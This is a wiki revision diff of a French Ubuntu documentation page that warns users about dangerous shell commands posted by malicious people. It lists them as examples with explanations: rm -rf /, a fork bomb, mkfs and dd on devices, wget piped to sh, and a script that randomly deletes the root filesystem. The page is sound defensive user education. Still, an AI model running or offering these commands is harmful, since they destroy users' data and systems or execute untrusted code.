Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

Les deux révisions précédentes Révision précédente
Prochaine révision
Révision précédente
commandes_dangereuses [Le 21/10/2009, 21:31]
213.95.41.13
commandes_dangereuses [Le 29/01/2024, 18:43] (Version actuelle)
krodelabestiole + note --no-preserve-root
Ligne 1: Ligne 1:
-{{tag>bash script}}+{{tag>​script}}
  
 ---- ----
  
-====== Les commandes dangereuses ====== ​+====== Les commandes dangereuses ======
  
-La ligne de commande est un outil puissant, et notamment très pratique pour détecter ou résoudre les problèmes : il en est donc souvent fait usage sur le forum ou dans la documentation.+La ligne de commande est un outil puissant, et notamment très pratique pour détecter ou résoudre les problèmes : il en est donc souvent fait usage sur le forum ou dans la documentation. ​Cependant, certains utilisateurs malveillants peuvent donner des commandes dangereuses qui corrompent, voire détruisent le système, ou les données. L'​exécution d'une commande nécessite donc toujours la plus grande prudence (utiliser la commande [[man]], moteurs de recherche, attente d'un deuxième avis, etc.). 
 +  
 +À titre d'​exemple et dans un but éducatif, afin de montrer qu'il convient toujours de se méfier, voilà quelques commandes dangereuses. 
 + 
 +<note warning>​Attention,​ ces commandes sont dangereuses,​ **ne les exécutez pas** !\\ 
 +N'​exécutez sous aucun prétexte une commande dont vous n'​êtes pas sûr, n'​hésitez pas à demander conseil sur le forum.</​note>​ 
 + 
 +Cette liste est loin d'​être exhaustive, mais devrait vous donner un aperçu de ce que les gens peuvent essayer de vous inciter à faire. Souvenez-vous que cela peut être dissimulé dans une commande ou masqué dans le cadre d'une procédure longue. 
 + 
 +<note >Les "​QUELQUE_CHOSE",​ "​QUELQUE_COMMANDE"​ et "​QUELQUE_CHOSE_IMPORTANT"​ indiqués dans les commandes pouvant être remplacés par n'​importe quelle chaîne de caractères.</​note>​
  
 ===== Suppression de tous les fichiers ou des fichiers du répertoire actuel ou de fichiers importants ===== ===== Suppression de tous les fichiers ou des fichiers du répertoire actuel ou de fichiers importants =====
 +
 Sous linux avec un terminal on peut tout faire, absolument tout. Donc lisez bien ceci : Sous linux avec un terminal on peut tout faire, absolument tout. Donc lisez bien ceci :
-Le danger de ces commandes est tout à fait évident : +Le danger de ces commandes est tout à fait évident :
 <note warning> <note warning>
-Règle n° 1 : NE JAMAIS VALIDER UNE COMMANDE QUI POURRAIT VOUS FAIRE PERDRE VOS DONNEES ​ET VOTRE SYSTEME.</​note>​+Règle n° 1 : NE JAMAIS VALIDER UNE COMMANDE QUI POURRAIT VOUS FAIRE PERDRE VOS DONNÉES ​ET VOTRE SYSTÈME.</​note>​
  
-En cas de doute, n'​hésitez pas à faire une sauvegarde de vos données sur un support externe tel qu'une clef USB, un disque dur USB, ou un CD/DVD enregistrable,​ et à vérifier que la sauvegarde ​à fonctionné.+En cas de doute, n'​hésitez pas à faire une sauvegarde de vos données sur un support externe tel qu'une clef USB, un disque dur USB, ou un CD/DVD enregistrable,​ et à vérifier que la sauvegarde ​fonctionné.
  
 Celles qui peuvent tout effacer (fichier système ou données personnelles) : Celles qui peuvent tout effacer (fichier système ou données personnelles) :
Ligne 26: Ligne 36:
 mv -r / /dev/null (Déplace les fichiers de façon récursive depuis la racine vers null = tout est effacé). mv -r / /dev/null (Déplace les fichiers de façon récursive depuis la racine vers null = tout est effacé).
 </​code>​ </​code>​
 +
 +<​note>​
 +Aujourd'​hui il existe tout de même une sécurité pour éviter que les bugs((voir ce [[https://​github.com/​ValveSoftware/​steam-for-linux/​issues/​3671|bug assez effroyable]] dans un ancien installeur de [[:Steam]] sur Linux par ex.)), les mauvaises manipulations,​ ou les mauvaises blagues autour de la fameuse commande ''​rm -rf /''​ entraînent des dégâts.
 +  * L'​option ''​%%--%%preserve-root''​ est activée par défaut.
 +  * Si par contre vous voyez l'​option ''​%%--%%no-preserve-root''​ quelque part sous vos yeux, mettez-vous en alerte maximale ! Il n'​existe aucune raison ordinaire d'​utiliser cette option.
 +</​note>​
  
 la commande la commande
Ligne 36: Ligne 52:
 Pourquoi ? Pourquoi ?
  
-  * rm est la commande de suppression des fichiers sous Gnu-Linux, rm quelque chose supprimera ce quelque chose, imaginez que vous supprimez tous vos fichiers système ( racine / ) , ou vos fichier personnels ( /​home/<​votreidentifiant/​ ) !+  * rm est la commande de suppression des fichiers sous Gnu/Linux, rm quelque chose supprimera ce quelque chose, imaginez que vous supprimez tous vos fichiers système ( racine / ) , ou vos fichier personnels ( /​home/<​votreidentifiant/​ ) !
 /dev/null est l'​équivalent de la corbeille définitive,​ tout fichier envoyé à cette sortie entraîne sa suppression. /dev/null est l'​équivalent de la corbeille définitive,​ tout fichier envoyé à cette sortie entraîne sa suppression.
  
Ligne 51: Ligne 67:
  
 Suppression du fichier labrador.jpeg (une image) Suppression du fichier labrador.jpeg (une image)
-au lieu d'​exécuter+au lieu d'​exécuter ​:
 <​code>​rm labrador.jpeg</​code>​ <​code>​rm labrador.jpeg</​code>​
  
Ligne 62: Ligne 78:
 <note warning> <note warning>
 Règle n° 2 : NE JAMAIS ou du moins LE MOINS POSSIBLE OUVRIR NAUTILUS (LE GESTIONNAIRE DE FICHIERS) EN MODE SUPER UTILISATEUR (ROOT) VOUS POURRIEZ PERDRE VOS DONNÉES ET ENDOMMAGER VOTRE SYSTÈME.</​note>​ Règle n° 2 : NE JAMAIS ou du moins LE MOINS POSSIBLE OUVRIR NAUTILUS (LE GESTIONNAIRE DE FICHIERS) EN MODE SUPER UTILISATEUR (ROOT) VOUS POURRIEZ PERDRE VOS DONNÉES ET ENDOMMAGER VOTRE SYSTÈME.</​note>​
- 
-Cliquer ici pour voir la commande avec une astuce en prime !! :\\ 
-[[nautilus#​ouvrir_un_fichier_en_tant_qu_administrateur| Ouvrir le gestionnaire de fichiers Nautilus avec tous les droits (root, super utilisateur)]] 
  
   * La commande find peut aussi être dangereuse, avec son paramètre -exec qui permet d'​exécuter une commande sur le résultat d'une recherche.   * La commande find peut aussi être dangereuse, avec son paramètre -exec qui permet d'​exécuter une commande sur le résultat d'une recherche.
 Par exemple, la commande suivante est très dangereuse : elle provoque la suppressions de tous les fichiers. Par exemple, la commande suivante est très dangereuse : elle provoque la suppressions de tous les fichiers.
 <​code>​sudo find / -name "​*"​ -exec rm {} \;</​code>​ <​code>​sudo find / -name "​*"​ -exec rm {} \;</​code>​
-De même pour rm qui est utilisé. +De même pour **rm** qui est utilisé.
 ===== Re-formatage ===== ===== Re-formatage =====
  
-Les données sur le périphérique mentionné après la commande mkfs seront détruites et remplacées par un système de fichier vide : +Les données sur le périphérique mentionné après la commande mkfs seront détruites et remplacées par un système de fichier vide :
  
 <​code>​ <​code>​
Ligne 83: Ligne 95:
 ===== Manipulation de périphériques de stockage ===== ===== Manipulation de périphériques de stockage =====
  
-Écrit des données sur le périphérique et peut entraîner la perte totale des données : +Écrit des données sur le périphérique et peut entraîner la perte totale des données :
  
 <​code>​ <​code>​
Ligne 94: Ligne 106:
 Exécute un grand nombre de processus jusqu'​à ce que le système gèle, ce qui vous force à faire un arrêt brutal et peut causer la corruption du système, ou d'​autres désagréments. Exécute un grand nombre de processus jusqu'​à ce que le système gèle, ce qui vous force à faire un arrêt brutal et peut causer la corruption du système, ou d'​autres désagréments.
  
-Avec le shell Bash : +Avec le shell Bash :
  
   :​(){:​|:&​};:​   :​(){:​|:&​};:​
Ligne 107: Ligne 119:
  
 Quelqu'​un vous demande d'​extraire une archive dans un répertoire existant. Cette archive tar peut être conçue pour exploser en un grand nombre de fichiers, voire écraser les fichiers de l'​utilisateur qui portent le même nom que ceux de l'​archive. Vous devriez donc prendre l'​habitude de décompresser des tar dans un nouveau répertoire vide. Quelqu'​un vous demande d'​extraire une archive dans un répertoire existant. Cette archive tar peut être conçue pour exploser en un grand nombre de fichiers, voire écraser les fichiers de l'​utilisateur qui portent le même nom que ceux de l'​archive. Vous devriez donc prendre l'​habitude de décompresser des tar dans un nouveau répertoire vide.
- +Ce cas est extrêmement rare, puisque, sous Ubuntu du moins, une archive contenant plus d'un fichier se décompressera dans un nouveau dossier. 
-===== Décompression ​bomb =====+<note important>​On parle ici de fichiers tar, mais c'est valable pour tous les formats de compression existant (zip, gzip, tar-gz etc...)</​note>​ 
 +===== Decompression ​bomb =====
  
 Quelqu'​un vous demande d'​extraire une archive qui semble petite lors du téléchargement mais qui contient à la décompression des données d'une taille beaucoup plus considérable,​ au point de remplir votre disque dur. Vous ne devriez pas utiliser des données d'une source non-fiable. Quelqu'​un vous demande d'​extraire une archive qui semble petite lors du téléchargement mais qui contient à la décompression des données d'une taille beaucoup plus considérable,​ au point de remplir votre disque dur. Vous ne devriez pas utiliser des données d'une source non-fiable.
 +N'​hésitez pas à regarder ce que contient le fichier compressé **avant** la décompression.
 ===== Shell ===== ===== Shell =====
  
-Quelqu'​un vous donne le lien vers un script shell à exécuter. Il peut contenir n'​importe quelle commande (bénigne ou malveillante). Vous ne devriez pas exécuter du code de personnes à qui vous ne faites pas confiance : +Quelqu'​un vous donne le lien vers un script shell à exécuter. Il peut contenir n'​importe quelle commande (bénigne ou malveillante). Vous ne devriez pas exécuter du code de personnes à qui vous ne faites pas confiance :
  
   wget http://​une_adresse/​un_fichier   wget http://​une_adresse/​un_fichier
Ligne 121: Ligne 134:
   wget http://​une_adresse/​un_fichier -O- | sh   wget http://​une_adresse/​un_fichier -O- | sh
  
-=== Roulette russe ===+==== Roulette russe ====
  
 Une fois ce script lancé, vous avez une "​chance"​ sur 6 pour que tous les fichiers à la racine de votre système soient effacés. Faites attention à ce script et ses variantes ! Une fois ce script lancé, vous avez une "​chance"​ sur 6 pour que tous les fichiers à la racine de votre système soient effacés. Faites attention à ce script et ses variantes !
Ligne 128: Ligne 141:
 #!/bin/bash #!/bin/bash
 echo ""​ echo ""​
-[ $[ $RANDOM % 6 ] == 0 ] && rm -fr / || echo "You live" ​+! (( $RANDOM % 6 )) && rm -rf / || echo "You live" ​
 exit 0 exit 0
 </​code> ​ </​code> ​
Ligne 194: Ligne 207:
 </​code>​ </​code>​
  
-Plus généralement,​ attention aux changements de droits, surtout quand ils s'​appliquent sur des dossiers. Par exemple un <​code>​chmod -R xxx /​home/​votre_utilisateur</​code>​ peut vous obliger à recréer un compte utilisateur,​ vu que certains fichiers nécessitent des droits particuliers.+Plus généralement,​ attention aux changements de droits, surtout quand ils s'​appliquent sur des dossiers. Par exemple un <​code>​chmod -R xxx /​home/​votre_utilisateur</​code> ​**peut vous obliger à recréer un compte utilisateur,​ vu que certains fichiers nécessitent des droits particuliers.**
  
 ===== Ajout d'un mot de passe au compte ===== ===== Ajout d'un mot de passe au compte =====
Ligne 202: Ligne 215:
 La commande "sudo passwd root " peut vous faire perdre vos droits sudo !! La commande "sudo passwd root " peut vous faire perdre vos droits sudo !!
  
-8-) Pour récupérer ses droits sudo sur son compte, se loguer en root ("su root") et tapez :+8-) Pour récupérer ses droits sudo sur son compte, se loguer en root ("sudo -i") et tapez :
  
   adduser votre_username sudo   adduser votre_username sudo
Ligne 208: Ligne 221:
 ===== Conclusion ===== ===== Conclusion =====
  
-Encore une fois, il ne s'agit pas de donner une liste complète des commandes malveillantes,​ et il ne faut pas utiliser cette page comme une liste de vérification pour déterminer si une commande est dangereuse ou pas ! Cette page est simplement éducative, pour faire prendre conscience à l'​utilisateur ​de la dangerosité potentielle ​du shell. Toute commande ne doit être exécutée que si elle est sûre et si l'on comprend ce que l'on fait.+Encore une fois, il ne s'agit pas de donner une liste complète des commandes malveillantes,​ et il ne faut pas utiliser cette page comme une liste de vérification pour déterminer si une commande est dangereuse ou pas ! Cette page est simplement éducative, pour faire prendre conscience à l'​utilisateur ​du danger potentiel ​du shell. Toute commande ne doit être exécutée que si elle est sûre et si l'on comprend ce que l'on fait.
  
-Le meilleur moyen d'​évaluer les risques est probablement l'​utilisation de la commande [[:page_de_manuel|man]]. ​+Le meilleur moyen d'​évaluer les risques est probablement l'​utilisation de la commande [[:​man]]. ​
  
 ---- ----
  
-//​Contributeurs principaux : [[utilisateurs:​la tite gogole]], [[utilisateurs:​tshirtman]],​ [[utilisateurs:​morgen_stern]].//​+//​Contributeurs principaux : [[utilisateurs:​на_краю]], [[utilisateurs:​tshirtman]],​ [[utilisateurs:​morgen_stern]].//​
  
-//Basé sur « [[http://​ubuntuforums.org/​announcement.php?​f=359|ATTENTION ALL USERS: Malicious Commands]] » par jdong.//+//Basé sur « [[https://​ubuntuforums.org/​announcement.php?​f=359|ATTENTION ALL USERS: Malicious Commands]] » par jdong.//
  • commandes_dangereuses.1256153467.txt.gz
  • Dernière modification: Le 21/10/2009, 21:31
  • par 213.95.41.13